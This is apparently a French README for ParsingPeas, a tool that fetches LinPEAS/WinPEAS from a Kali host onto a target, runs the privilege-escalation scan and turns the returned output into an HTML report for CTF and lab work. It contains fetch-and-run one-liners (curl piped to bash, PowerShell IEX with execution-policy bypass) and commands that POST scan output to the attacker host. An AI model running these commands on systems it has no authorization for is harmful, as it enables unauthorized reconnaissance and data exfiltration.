
Analyseur HTML pour la sortie de PEAS avec des fonctionnalités supplémentaires
Collecte automatisée de PEASS + un rapport HTML propre et portable pour le travail d'escalade de privilèges en CTF et en laboratoire.
Exécutez une seule commande sur la cible. ParsingPeas récupère LinPEAS/WinPEAS depuis votre hôte Kali, lance l'analyse, renvoie la sortie et la transforme en un unique rapport HTML autonome que vous pouvez lire, rechercher, trier et conserver — sans transfert manuel de fichiers, sans Internet sur la cible.
Résumé du rapport — sections regroupées par catégories propres à LinPEAS, avec des points de signalement et une barre des résultats :

Résultats uniquement — un clic filtre le rapport et la barre latérale pour n'afficher que les sections avec des hits critiques/élevés :

Sortie terminal complète — l'intégralité du scan, fidèlement colorisée ; interrogeable avec Ctrl+F :

La sortie brute de PEASS est un mur de texte terminal défilant qui disparaît dès que votre shell meurt. ParsingPeas :
scp, pas d'hébergement de linpeas vous-même, pas de
copier-coller de la sortie vers Kali..html autonome que vous
pouvez copier hors de la machine, archiver ou ouvrir hors ligne en double-cliquant.C'est de la présentation + logistique, pas un moteur d'exploitation : il préserve fidèlement le coloriage et les résultats de PEASS plutôt que de les réinterpréter.
file://.N critique / N élevé qui sautent entre les sections signalées,
plus une légende de couleurs.bash) et WinPEAS (PowerShell).git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh # télécharge LinPEAS + WinPEAS dans scripts/
pip3 install -r requirements.txt
python3 receiver.py # sert sur http://0.0.0.0:8005
Laissez receiver.py en cours d'exécution. Trouvez l'adresse IP par laquelle la cible vous atteindra :
tun0 — ip -4 addr show tun0Linux/Unix (utilise curl, se rabat sur wget) :
curl -sSL http://VOTRE_IP_KALI:8005/get-script | bash
Windows (PowerShell / reverse shell) :
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://VOTRE_IP_KALI:8005/get-script.ps1')"
Choisissez la commande unique qui correspond au système d'exploitation cible — Linux sert LinPEAS, Windows sert WinPEAS.
Les rapports sont générés sur votre hôte Kali dans ./reports/. Soit :
http://VOTRE_IP_KALI:8005 et cliquez sur un rapport, ouxdg-open ./reports/report_<hôte>_<horodatage>.html
Copiez ce seul fichier .html n'importe où ; il fonctionne tout seul.
Cible → télécharge le wrapper depuis Kali → exécute PEASS → POSTe la sortie → Kali analyse → rapport HTML autonome
La cible n'a jamais besoin d'Internet — le wrapper et les binaires PEASS sont tous servis depuis votre hôte.
Si la commande unique échoue, faites-le à la main.
Linux :
# Sur la cible
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Renvoyer
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
--data-binary @/tmp/out.txt http://KALI_IP:8005/upload
Windows (PowerShell) :
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
-Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
-InFile $env:TEMP\out.txt
Analyser un vidage PEASS que vous possédez déjà :
python3 parser.py /chemin/vers/peas_output.txt # écrit un rapport HTML dans ./reports/
Modifiez le haut de receiver.py :
curl http://KALI_IP:8005/health pour vérifier
la connectivité ; ouvrez le pare-feu avec sudo ufw allow 8005/tcp./get-linpeas ? Exécutez ./setup.sh pour récupérer les binaires PEASS.⚠️ Pour tests d'intrusion autorisés, CTF et utilisation en laboratoire uniquement.
Construit sur PEASS-ng par @carlospolop. ParsingPeas collecte et présente uniquement sa sortie.
Licence MIT · Les contributions sont les bienvenues
| Réglage | Valeur par défaut | Remarques |
|---|
| Port | 8005 | changez la ligne app.run(... port=...) |
OUTPUT_DIR | ./received_outputs | scans bruts téléchargés |
REPORTS_DIR | ./reports | rapports HTML générés |
SCRIPTS_DIR | ./scripts | binaires LinPEAS/WinPEAS |
MAX_UPLOAD_SIZE | 10 Mo | appliqué — les téléchargements plus volumineux reçoivent HTTP 413 |